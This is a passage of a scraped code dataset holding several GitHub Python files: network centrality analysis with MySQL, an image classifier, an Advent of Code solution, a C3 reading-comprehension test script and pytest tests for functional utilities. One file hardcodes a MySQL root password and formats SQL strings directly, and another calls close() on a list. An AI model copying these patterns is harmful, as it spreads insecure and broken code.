nodedata where generation=%d'%(maxgen))\r\n #nodedata = cur.fetchall()\r\n nodedata = last_nodedata\r\n id_num=len(nodedata)\r\n for i in range(id_num):\r\n label_style={} # tooltip label config shown when a node is hovered\r\n node_emphasis={}\r\n label_style['formatter']='id: %d\\n------------------------\\ndegree: %d\\nbetweenness: %f\\ncloseness: %f\\neigenvector: %f\\nkatz: %f\\ncluster: %f\\ntriangle: %d'%(nodedata[i][1],nodedata[i][2],nodedata[i][3],nodedata[i][4],nodedata[i][5],nodedata[i][6],nodedata[i][7],nodedata[i][8])\r\n label_style['align']='left'\r\n label_style['position']='right'\r\n label_style['color']= \"rgba(255, 255, 255, 1)\"\r\n label_style['backgroundColor']= \"rgba(0, 0, 0, 0.7)\"\r\n label_style['fontSize']= \"14\"\r\n label_style['padding']= 5\r\n label_style['borderRadius']= 10\r\n node_emphasis['label']=label_style\r\n last_strtojson['series'][0]['nodes'][i]['emphasis']=node_emphasis\r\n\r\n return jsonify(avg_degree=last_avgdegree,avg_path=last_avgpath,avg_cluster=last_avgcluster,json_str=last_strtojson,histogramtostr=last_histogram)\r\n\r\n\r\n\r\ndef WRnode(gene):\r\n \r\n conn = pymysql.connect(host='localhost', port=3306, user='root', passwd='123456', db='networkxdata')\r\n cur = conn.cursor()\r\n cur.execute('select * from jsondata where generation=%d' %gene)\r\n mydata = cur.fetchall()\r\n mydata = mydata[0][1]\r\n mydata = json.loads(mydata)\r\n G = json_graph.node_link_graph(mydata)\r\n\r\n num_node=G.number_of_nodes()\r\n \r\n 
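# [Hedged sketch] The centrality block below guards nx.eigenvector_centrality
# against non-convergence by filling in zeros. An alternative fallback (an
# assumption here, not what the original record does) is the dense solver:
def eigenvector_with_fallback(G):
    import networkx as nx
    try:
        # power iteration; can raise PowerIterationFailedConvergence
        return nx.eigenvector_centrality(G, max_iter=1000)
    except nx.PowerIterationFailedConvergence:
        # exact dense eigensolver; fine for small graphs
        return nx.eigenvector_centrality_numpy(G)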
bc=nx.betweenness_centrality(G)\r\n cc=nx.closeness_centrality(G)\r\n try:\r\n ec=nx.eigenvector_centrality(G,max_iter=1000)\r\n except Exception:\r\n ec={}\r\n for i in range(num_node):\r\n ec[i]=0\r\n print('eigenvector centrality failed to converge; using zeros for generation:')\r\n print(gene)\r\n \r\n kc=nx.katz_centrality(G)\r\n\r\n \r\n for n in range(G.number_of_nodes()):\r\n node_id=n\r\n id_degree=G.degree(n)\r\n id_betweeness=bc[n]\r\n id_closeness=cc[n]\r\n id_eigenvector=ec[n]\r\n id_katz=kc[n]\r\n\r\n id_cluster= nx.clustering(G,n)\r\n id_triangle= nx.triangles(G,n)\r\n tsql = \"insert into nodedata(generation,nodeid,degree,betweeness,closeness,eigenvector,katz,cluster,triangle) values(%d,%d,%d,%f,%f,%f,%f,%f,%d)\"%(gene,node_id,id_degree,id_betweeness,id_closeness,id_eigenvector,id_katz,id_cluster,id_triangle)\r\n cur.execute(tsql)\r\n\r\n conn.commit()","repo_name":"minyuehe/Software_curriculum_design","sub_path":"network/cal.py","file_name":"cal.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"19080533716","text":"\nfrom keras.models import load_model\nimport numpy as np\nfrom PIL import Image\n\nmodel = load_model('src/image_detection/Furry-Detection-Model')\n\ndef predict(img : Image) -> int:\n img = img.resize((300, 300))\n img = img.convert(\"RGB\")\n img_arr = np.array(img)\n\n x = np.array([img_arr])/255\n pred = model.predict(x)\n \n # np.argmax returns the index of the highest-scoring class, so the\n # function yields an int, not a str\n max_index = np.argmax(pred[0])\n \n return max_index\n","repo_name":"Mikask1/Rara-chan","sub_path":"src/image_detection/image_detection_module.py","file_name":"image_detection_module.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"23983860344","text":"import os.path\n\n#input_file = os.path.dirname(os.path.realpath(__file__)) + \"/ExampleData.txt\"\ninput_file = os.path.dirname(os.path.realpath(__file__)) + \"/MyDataSet.txt\"\n\nwith open(input_file) as data_set:\n elf_no = 0\n calories = [0]\n\n # Iterate over lines of the input\n for line in data_set:\n if line != \"\\n\":\n calories[elf_no] = calories[elf_no] + int(line)\n else:\n # \\n means next elf\n calories.append(0)\n elf_no = elf_no + 1\n\n print(\"Max calories (Answer of Part 1): \", max(calories))\n\n # Answer of part 2\n calories.sort(reverse=True)\n print(\"Max 3 calories: \", calories[0], calories[1], calories[2])\n print(\"And the sum is: \", sum(calories[0:3]))\n\n\n","repo_name":"zimtschge/AdventOfCode2022","sub_path":"Day01/calory_check.py","file_name":"calory_check.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18077214829","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport csv\nimport json\nimport logging\nimport os\nimport pickle\nimport random\n\nimport numpy as np\nimport torch\nfrom google_albert_pytorch_modeling import AlbertConfig, AlbertForMultipleChoice\nfrom pytorch_modeling import BertConfig, BertForMultipleChoice, ALBertConfig, ALBertForMultipleChoice\nfrom tools import official_tokenization as tokenization\nfrom tools import utils\nfrom tools.pytorch_optimization import get_optimization, warmup_linear\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\nfrom torch.utils.data.distributed import DistributedSampler\nfrom tqdm import tqdm\n\nn_class = 4\nreverse_order = False\nsa_step = 
False\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass InputExample(object):\n \"\"\"A single training/test example for simple sequence classification.\"\"\"\n\n def __init__(self, guid, text_a, text_b=None, text_c=None):\n \"\"\"Constructs an InputExample.\n Args:\n guid: Unique id for the example.\n text_a: string. The untokenized text of the first sequence. For single\n sequence tasks, only this sequence must be specified.\n text_b: (Optional) string. The untokenized text of the second sequence.\n Only must be specified for sequence pair tasks.\n text_c: (Optional) string. The untokenized question text for\n C3-style multiple-choice examples.\n \"\"\"\n self.guid = guid\n self.text_a = text_a\n self.text_b = text_b\n self.text_c = text_c\n\n\nclass InputFeatures(object):\n \"\"\"A single set of features of data.\"\"\"\n\n def __init__(self, input_ids, input_mask, segment_ids):\n self.input_ids = input_ids\n self.input_mask = input_mask\n self.segment_ids = segment_ids\n\n\nclass DataProcessor(object):\n \"\"\"Base class for data converters for sequence classification data sets.\"\"\"\n\n def get_train_examples(self):\n \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\"\n raise NotImplementedError()\n\n def get_dev_examples(self):\n \"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\"\n raise NotImplementedError()\n\n def get_labels(self):\n \"\"\"Gets the list of labels for this data set.\"\"\"\n raise NotImplementedError()\n\n @classmethod\n def _read_tsv(cls, input_file, quotechar=None):\n \"\"\"Reads a tab separated value file.\"\"\"\n with open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines\n\n\nclass c3Processor(DataProcessor):\n def __init__(self, data_dir):\n self.D = []\n self.data_dir = data_dir\n\n data = []\n with open(os.path.join(self.data_dir , \"d-test.json\"),\"r\", encoding=\"utf8\") as f:\n data += json.load(f)\n\n for i in range(len(data)):\n for j in range(len(data[i][1])):\n d = ['\\n'.join(data[i][0]).lower(), data[i][1][j][\"question\"].lower()]\n for k in range(len(data[i][1][j][\"choice\"])):\n d += [data[i][1][j][\"choice\"][k].lower()]\n for k in range(len(data[i][1][j][\"choice\"]), 4):\n d += ['无效答案'] # Some C3 items have fewer than 4 choices; padding with the '无效答案' (invalid answer) placeholder noticeably improves convergence stability\n self.D += [d]\n\n def get_test_examples(self):\n \"\"\"See base class.\"\"\"\n return self._create_examples(self.D, \"test\")\n\n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [\"0\", \"1\", \"2\", \"3\"]\n\n def _create_examples(self, data, set_type):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n cache_dir = os.path.join(self.data_dir, set_type + '_examples.pkl')\n if os.path.exists(cache_dir):\n examples = pickle.load(open(cache_dir, 'rb'))\n else:\n examples = []\n for (i, d) in enumerate(data):\n\n for k in range(4):\n guid = \"%s-%s-%s\" % (set_type, i, k)\n text_a = tokenization.convert_to_unicode(data[i][0])\n text_b = tokenization.convert_to_unicode(data[i][k + 2])\n text_c = tokenization.convert_to_unicode(data[i][1])\n examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, text_c=text_c))\n\n with open(cache_dir, 'wb') as w:\n pickle.dump(examples, w)\n print(\"example length: \",len(examples))\n return examples\n\n\ndef 
convert_examples_to_features(examples, max_seq_length, tokenizer):\n \"\"\"Loads a data file into a list of `InputBatch`s.\"\"\"\n # features hold token ids, masks, etc.; they are not yet embedded\n\n\n features = [[]] # 2-D list: one inner list of n_class feature sets per question\n for (ex_index, example) in enumerate(tqdm(examples)):\n tokens_a = tokenizer.tokenize(example.text_a)\n\n tokens_b = tokenizer.tokenize(example.text_b)\n\n tokens_c = tokenizer.tokenize(example.text_c)\n\n _truncate_seq_tuple(tokens_a, tokens_b, tokens_c, max_seq_length - 4)\n tokens_b = tokens_c + [\"[SEP]\"] + tokens_b\n\n tokens = []\n segment_ids = []\n tokens.append(\"[CLS]\")\n segment_ids.append(0)\n for token in tokens_a:\n tokens.append(token)\n segment_ids.append(0)\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n\n if tokens_b:\n for token in tokens_b:\n tokens.append(token)\n segment_ids.append(1)\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask = [1] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n while len(input_ids) < max_seq_length:\n input_ids.append(0)\n input_mask.append(0)\n segment_ids.append(0)\n\n assert len(input_ids) == max_seq_length\n assert len(input_mask) == max_seq_length\n assert len(segment_ids) == max_seq_length\n\n if ex_index < 5:\n logger.info(\"*** Example ***\")\n logger.info(\"guid: %s\" % (example.guid))\n logger.info(\"tokens: %s\" % \" \".join(\n [tokenization.printable_text(x) for x in tokens]))\n logger.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids]))\n logger.info(\"input_mask: %s\" % \" \".join([str(x) for x in input_mask]))\n logger.info(\n \"segment_ids: %s\" % \" \".join([str(x) for x in segment_ids]))\n # TODO: inspect the structure of features and adapt the batching\n features[-1].append(\n InputFeatures(\n input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids))\n if len(features[-1]) == n_class:\n features.append([])\n\n if len(features[-1]) == 0:\n features = features[:-1]\n return features\n\n\ndef _truncate_seq_pair(tokens_a, tokens_b, max_length):\n \"\"\"Truncates a sequence pair in place to the maximum length.\"\"\"\n\n # This is a simple heuristic which will always truncate the longer sequence\n # one token at a time. This makes more sense than truncating an equal percent\n # of tokens from each, since if one sequence is very short then each token\n # that's truncated likely contains more information than a longer sequence.\n while True:\n total_length = len(tokens_a) + len(tokens_b)\n if total_length <= max_length:\n break\n if len(tokens_a) > len(tokens_b):\n tokens_a.pop()\n else:\n tokens_b.pop()\n\n\ndef _truncate_seq_tuple(tokens_a, tokens_b, tokens_c, max_length):\n \"\"\"Truncates a sequence tuple in place to the maximum length.\"\"\"\n\n # This is a simple heuristic which will always truncate the longer sequence\n # one token at a time. 
This makes more sense than truncating an equal percent\n # of tokens from each, since if one sequence is very short then each token\n # that's truncated likely contains more information than a longer sequence.\n while True:\n total_length = len(tokens_a) + len(tokens_b) + len(tokens_c)\n if total_length <= max_length:\n break\n if len(tokens_a) >= len(tokens_b) and len(tokens_a) >= len(tokens_c):\n tokens_a.pop()\n elif len(tokens_b) >= len(tokens_a) and len(tokens_b) >= len(tokens_c):\n tokens_b.pop()\n else:\n tokens_c.pop()\n\n\ndef accuracy(out, labels):\n outputs = np.argmax(out, axis=1)\n return np.sum(outputs == labels)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n ## Required parameters\n parser.add_argument(\"--gpu_ids\",\n default='0',\n type=str,\n required=True)\n parser.add_argument(\"--data_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The input data dir. Should contain the .tsv files (or other data files) for the task.\")\n parser.add_argument(\"--task_name\",\n default='c3',\n type=str,\n required=True)\n parser.add_argument(\"--bert_config_file\",\n default=None,\n type=str,\n required=True,\n help=\"The config json file corresponding to the pre-trained BERT model. \\n\"\n \"This specifies the model architecture.\")\n parser.add_argument(\"--vocab_file\",\n default=None,\n type=str,\n required=True,\n help=\"The vocabulary file that the BERT model was trained on.\")\n parser.add_argument(\"--output_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The output directory where the model checkpoints will be written.\")\n\n ## Other parameters\n parser.add_argument(\"--init_checkpoint\",\n default='check_points/pretrain_models/albert_xxlarge_google_zh_v1121/pytorch_model.pth',\n type=str,\n help=\"Initial checkpoint (usually from a pre-trained BERT model).\")\n parser.add_argument(\"--do_lower_case\",\n default=True,\n action='store_true',\n help=\"Whether to lower case the input text. True for uncased models, False for cased models.\")\n parser.add_argument(\"--max_seq_length\",\n default=512,\n type=int,\n help=\"The maximum total input sequence length after WordPiece tokenization. 
\\n\"\n \"Sequences longer than this will be truncated, and sequences shorter \\n\"\n \"than this will be padded.\")\n parser.add_argument(\"--do_test\",\n default=True,\n action='store_true',\n help=\"Whether to run test on the test set.\")\n parser.add_argument(\"--test_batch_size\",\n default=16,\n type=int,\n help=\"Total batch size for test.\")\n parser.add_argument(\"--schedule\",\n default='warmup_linear',\n type=str,\n help='schedule')\n parser.add_argument(\"--no_cuda\",\n default=False,\n action='store_true',\n help=\"Whether not to use CUDA when available\")\n parser.add_argument('--float16',\n action='store_true',\n default=False)\n parser.add_argument(\"--local_rank\",\n type=int,\n default=-1,\n help=\"local_rank for distributed training on gpus\")\n parser.add_argument('--seed',\n type=int,\n default=422,\n help=\"random seed for initialization\")\n parser.add_argument('--setting_file', type=str, default='setting.txt')\n parser.add_argument('--log_file', type=str, default='log.txt')\n\n args = parser.parse_args()\n args.setting_file = os.path.join(args.output_dir, args.setting_file)\n args.log_file = os.path.join(args.output_dir, args.log_file)\n os.makedirs(args.output_dir, exist_ok=True)\n with open(args.setting_file, 'wt') as opt_file:\n opt_file.write('------------ Options -------------\\n')\n print('------------ Options -------------')\n for k in args.__dict__:\n v = args.__dict__[k]\n opt_file.write('%s: %s\\n' % (str(k), str(v)))\n print('%s: %s' % (str(k), str(v)))\n opt_file.write('-------------- End ----------------\\n')\n print('------------ End -------------')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_ids\n\n if os.path.exists(args.log_file):\n os.remove(args.log_file)\n\n if args.local_rank == -1 or args.no_cuda:\n device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n n_gpu = torch.cuda.device_count()\n else:\n device = torch.device(\"cuda\", args.local_rank)\n n_gpu = 1\n # Initializes the distributed backend which will take care of sychronizing nodes/GPUs\n torch.distributed.init_process_group(backend='nccl')\n logger.info(\"device %s n_gpu %d distributed training %r\", device, n_gpu, bool(args.local_rank != -1))\n\n\n\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if n_gpu > 0:\n torch.cuda.manual_seed_all(args.seed)\n\n processor = c3Processor(args.data_dir)\n label_list = processor.get_labels()\n\n tokenizer = tokenization.BertTokenizer(vocab_file=args.vocab_file, do_lower_case=args.do_lower_case)\n\n\n if 'albert' in args.bert_config_file:\n if 'google' in args.bert_config_file:\n bert_config = AlbertConfig.from_json_file(args.bert_config_file)\n model = AlbertForMultipleChoice(bert_config, num_choices=n_class)\n else:\n bert_config = ALBertConfig.from_json_file(args.bert_config_file)\n model = ALBertForMultipleChoice(bert_config, num_choices=n_class)\n else:\n bert_config = BertConfig.from_json_file(args.bert_config_file)\n model = BertForMultipleChoice(bert_config, num_choices=n_class)\n\n if args.max_seq_length > bert_config.max_position_embeddings:\n raise ValueError(\n \"Cannot use sequence length {} because the BERT model was only trained up to sequence length {}\".format(\n args.max_seq_length, bert_config.max_position_embeddings))\n\n if args.init_checkpoint is not None:\n utils.torch_show_all_params(model)\n utils.torch_init_model(model, args.init_checkpoint)\n if args.float16:\n model.half()\n model.to(device)\n\n if args.local_rank != -1:\n model = 
torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.local_rank],\n output_device=args.local_rank)\n #elif n_gpu > 1:\n else:\n model = torch.nn.DataParallel(model)\n\n #load model params\n model.load_state_dict(torch.load(os.path.join(args.output_dir, \"model.pt\")),strict=False)\n\n test_dataloader = None\n if args.do_test:\n test_examples = processor.get_test_examples()\n feature_dir = os.path.join(args.data_dir, 'test_features{}.pkl'.format(args.max_seq_length))\n if os.path.exists(feature_dir):\n test_features = pickle.load(open(feature_dir, 'rb'))\n else:\n test_features = convert_examples_to_features(test_examples, args.max_seq_length, tokenizer)\n with open(feature_dir, 'wb') as w:\n pickle.dump(test_features, w)\n input_ids = []\n input_mask = []\n segment_ids = []\n\n\n for f in test_features:\n input_ids.append([])\n input_mask.append([])\n segment_ids.append([])\n for i in range(n_class):\n input_ids[-1].append(f[i].input_ids)\n input_mask[-1].append(f[i].input_mask)\n segment_ids[-1].append(f[i].segment_ids)\n\n\n all_input_ids = torch.tensor(input_ids, dtype=torch.long)\n all_input_mask = torch.tensor(input_mask, dtype=torch.long)\n all_segment_ids = torch.tensor(segment_ids, dtype=torch.long)\n\n\n test_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids)\n if args.local_rank == -1:\n test_sampler = SequentialSampler(test_data)\n else:\n test_sampler = DistributedSampler(test_data)\n test_dataloader = DataLoader(test_data, sampler=test_sampler, batch_size=args.test_batch_size)\n\n logger.info(\"***** Running test phase *****\")\n logger.info(\" Num examples = %d\", len(test_examples))\n logger.info(\" Batch size = %d\", args.test_batch_size)\n\n model.eval()\n test_loss, test_accuracy = 0, 0\n nb_test_steps, nb_test_examples = 0, 0\n logits_all = []\n for input_ids, input_mask, segment_ids in tqdm(test_dataloader):\n input_ids = input_ids.to(device)\n input_mask = input_mask.to(device)\n segment_ids = segment_ids.to(device)\n\n with torch.no_grad():\n reshaped_logits = model(input_ids, segment_ids, input_mask, return_logits=True)\n\n logits = reshaped_logits.detach().cpu().numpy()\n for i in range(len(logits)):\n logits_all += [logits[i]]\n\n\n\n nb_test_examples += input_ids.size(0)\n nb_test_steps += 1\n logger.info(\"***** Test results *****\")\n output_test_file = os.path.join(args.output_dir, \"results_test.txt\")\n\n with open(output_test_file, \"w\") as f:\n for i in range(len(logits_all)):\n for j in range(len(logits_all[i])):\n f.write(str(logits_all[i][j]))\n if j == len(logits_all[i]) - 1:\n f.write(\"\\n\")\n else:\n f.write(\" \")\n f.close()\n\n # the test submission order can't be changed\n submission_test = os.path.join(args.output_dir, \"%s_predict.json\" %(args.task_name))\n g=json.load(open(r'./mrc_data/c3/d-test.json','r',encoding='utf-8'))\n idlst=[]\n for i in range(len(g)):\n for j in range(len(g[i][1])):\n idlst.append(g[i][1][j]['id'])\n g.close()\n test_preds = [int(np.argmax(logits_)) for logits_ in logits_all]\n assert len(idlst)==len(test_preds)\n\n with open(submission_test, \"w\") as f:\n for l in range(len(idlst)):\n dic={'id':idlst[l], 'label':test_preds[l]}\n f.write(json.dumps(dic)+'\\n')\n f.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"insomnia1996/mrc_c3","sub_path":"test_c3.py","file_name":"test_c3.py","file_ext":"py","file_size_in_byte":19515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 
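# [Hedged sketch] Minimal standalone illustration of the tuple-truncation
# heuristic used by _truncate_seq_tuple in the record above: the longest of
# the three token lists is trimmed one token at a time until the combined
# length fits the budget. Names and values here are illustrative only.
def truncate_tuple_demo(max_length=8):
    a, b, c = list("aaaaaa"), list("bbb"), list("cc")
    while len(a) + len(b) + len(c) > max_length:
        # pop from whichever list is currently longest (first on ties)
        max((a, b, c), key=len).pop()
    return len(a), len(b), len(c)  # -> (3, 3, 2) for the inputs above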
+{"seq_id":"42340743305","text":"#!/usr/bin/python3\n\"\"\"\nFunction that read a text file\n\"\"\"\n\n\ndef read_lines(filename=\"\", nb_lines=0):\n \"\"\"\n Function that reads n lines of a text file\n\n Args:\n filename: name of the file\n nb_lines: number of lines to read\n \"\"\"\n tlines = 0\n with open(filename, encoding='utf-8') as a_file:\n for line in a_file:\n tlines += 1\n\n with open(filename, encoding='utf-8') as a_file:\n if nb_lines <= 0 or nb_lines >= tlines:\n print(a_file.read(), end='')\n else:\n for line in range(nb_lines):\n print(a_file.readline(), end='')\n","repo_name":"jaarmore/holbertonschool-higher_level_programming","sub_path":"0x0B-python-input_output/2-read_lines.py","file_name":"2-read_lines.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25732753079","text":"import random\nfrom itertools import tee\n\nimport pytest\n\nfrom caldera.utils import functional as F\n\n\ndef randint(a, b, n=None):\n if n is None:\n return random.randint(a, b)\n else:\n return [random.randint(a, b) for _ in range(n)]\n\n\ndef validate_generator(generator, expected):\n # assert inspect.isgenerator(generator) or inspect.isgeneratorfunction(generator)\n\n result_generator, result_generator2 = tee(generator)\n expected_generator, expected_generator2 = tee(expected)\n print()\n print(\"Result: \" + str(list(result_generator2)))\n print(\"Expected: \" + str(list(expected_generator2)))\n ith = 0\n for _result, _expected in zip(result_generator, expected_generator):\n assert _result == _expected\n ith += 1\n\n with pytest.raises(StopIteration):\n next(result_generator), \"There were values remaining in `result`\"\n with pytest.raises(StopIteration):\n next(expected_generator), \"There were values remaining in `expected` generator\"\n\n\nclass TestParametrizedBasic:\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.group_each_into_chunks,\n (3,),\n {},\n [1, 2, 3, 4],\n [[1, 2, 3], [4]],\n ),\n (F.group_each_into_chunks, (4,), {}, [1, 2, 3, 4], [[1, 2, 3, 4]]),\n (F.group_each_into_chunks, (5,), {}, [1, 2, 3, 4], [[1, 2, 3, 4]]),\n (\n F.group_each_into_chunks,\n (1,),\n {},\n [1, 2, 3, 4],\n [[1], [2], [3], [4]],\n ),\n (\n F.group_each_into_chunks,\n (3,),\n {},\n range(10),\n [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]],\n ),\n ],\n )\n def test_chunks(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.filter_each,\n (lambda x: x >= 3,),\n {},\n range(10),\n list(range(3, 10)),\n ),\n (\n F.filter_each,\n (lambda x: x >= 3,),\n {\"inverse\": True},\n range(10),\n list(range(3)),\n ),\n (F.filter_each, (lambda x: x == 30,), {}, range(10), []),\n ],\n )\n def test_filter_each(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.ignore_each_until,\n (lambda x: x == 1,),\n {},\n [10, 2, 1, 2, 3, 1, 4, 2],\n [1, 2, 3, 1, 4, 2],\n ),\n ],\n )\n def test_ignore_until(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n 
F.iter_each_until,\n (lambda x: x == 1,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [10, 2, 3],\n ),\n ],\n )\n def test_iter_each_until(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.ignore_each_count,\n (4,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [2, 3, 1, 4, 2],\n ),\n ],\n )\n def test_ignore_each_count(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.iter_count,\n (4,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [10, 2, 3, 1],\n ),\n (\n F.iter_count,\n (40,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n ),\n ],\n )\n def test_iter_count(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n # @pytest.mark.parametrize(\"n\", [0, 1, 10, 30])\n # def test_iter_count_has_remaining(self, n):\n # data = randint(1, 10, 100)\n # data_gen = iter(data)\n # result = F.iter_count(n)(data)\n # print(data)\n # validate_generator(result, data[:n])\n # validate_generator(data_gen, data[n:])\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.iter_step,\n (1,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [10, 2, 3, 1, 2, 3, 1, 4, 2][::1],\n ),\n (\n F.iter_step,\n (3,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [10, 2, 3, 1, 2, 3, 1, 4, 2][::3],\n ),\n (\n F.iter_step,\n (20,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2],\n [10, 2, 3, 1, 2, 3, 1, 4, 2][::20],\n ),\n ],\n )\n def test_step(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n @pytest.mark.parametrize(\n (\"func\", \"args\", \"kwargs\", \"arr\", \"expected\"),\n [\n (\n F.group_each_consecutive,\n (lambda x: x % 2,),\n {},\n [10, 2, 3, 1, 2, 3, 1, 4, 2, 1],\n [[10, 2], [3, 1], [2], [3, 1], [4, 2], [1]],\n )\n ],\n )\n def test_group_each_consecutive(self, func, args, kwargs, arr, expected):\n f = func(*args, **kwargs)\n result = f(arr)\n validate_generator(result, expected)\n\n\nclass TestWithRandomData:\n def test_enumerate_each(self):\n data = randint(1, 1000, 100)\n f = F.enumerate_each()\n result = f(iter(data))\n result = f(iter(data))\n validate_generator(result, enumerate(data))\n\n def test_enumerate_each_2(self):\n data = randint(1, 1000, 3)\n f = F.enumerate_each()\n list(f(iter(data)))\n result = f(iter(data))\n result = f(iter(data))\n validate_generator(result, enumerate(data))\n\n def test_side_effect(self):\n data = randint(1, 1000, 100)\n\n arr = []\n\n def my_side_effect(a):\n print(a)\n if a < 100:\n arr.append(a)\n\n f = F.apply_each(my_side_effect)\n result = f(iter(data))\n validate_generator(result, data)\n assert arr == [d for d in data if d < 100]\n\n def test_index_each(self):\n data = iter([[1, 2, 3], [20, 30]])\n f = F.index_each(0)\n assert list(f(data)) == [1, 20]\n\n def test_cat(self):\n data1 = randint(1, 10, 100)\n data2 = randint(1, 10, 100)\n\n f = F.cat(iter(data2))\n\n result = f(iter(data1))\n print(result)\n assert list(next(result)) == data1\n assert list(next(result)) == data2\n\n result = f(iter(data1))\n assert list(next(result)) == data1\n assert list(next(result)) == data2\n\n def test_repeat(self):\n data = iter(range(10))\n f = 
F.repeat_all(3)\n result = f(data)\n assert list(result) == list(range(10)) * 3\n\n @pytest.mark.parametrize(\"n\", [0, 1, 50])\n def test_iter_count(self, n):\n data = randint(1, 1000, 50)\n f = F.iter_count(n)\n result = list(f(iter(data)))\n assert len(result) == n\n assert result == data[:n]\n\n def test_repeat_forever(self):\n data = iter(range(10))\n f = F.compose(F.repeat_all(10), F.iter_count(12))\n result = f(data)\n assert list(result) == (list(range(10)) * 2)[:12]\n\n def test_pairwise_each(self):\n data = randint(1, 1000, 100)\n expected = zip(data, data[1:])\n result = F.pairwise_each()(iter(data))\n validate_generator(result, expected)\n\n def test_yield_all(self):\n data = randint(1, 1000, 100)\n result = F.yield_all()(iter(data))\n validate_generator(next(result), data)\n with pytest.raises(StopIteration):\n next(result)\n\n def test_yield_all_with_func(self):\n def foo(arr):\n yield from range(10)\n\n data = randint(1, 1000, 100)\n result = F.yield_all(foo)(iter(data))\n validate_generator(next(result), range(10))\n\n @pytest.mark.parametrize(\"n\", [0, 1, 3, 10])\n def test_tee_all(self, n):\n data = randint(1, 1000, 100)\n result = F.tee_all(n)(iter(data))\n for _ in range(n):\n validate_generator(next(result), iter(data))\n with pytest.raises(StopIteration):\n next(result)\n\n def test_get_each(self):\n data = randint(1, 1000, 100)\n kv = [{\"x\": x} for x in data]\n result = F.get_each(\"x\")(iter(kv))\n validate_generator(result, data)\n\n def test_get_each_with_default(self):\n data = randint(1, 1000, 100)\n kv = [{\"x\": x} for x in data]\n result = F.get_each(\"k\", default=123)(iter(kv))\n validate_generator(result, [123] * len(data))\n\n def test_iter_next(self):\n data = randint(1, 1000, 10)\n result = F.iter_next()(iter(data))\n validate_generator(result, data[:1])\n\n def test_group_each_until(self):\n\n data = randint(1, 1000, 100)\n\n f = F.group_each_until(lambda x: len(x) > 5, lambda x: x < 100)\n\n result = f(iter(data))\n i = 0\n for chunk in 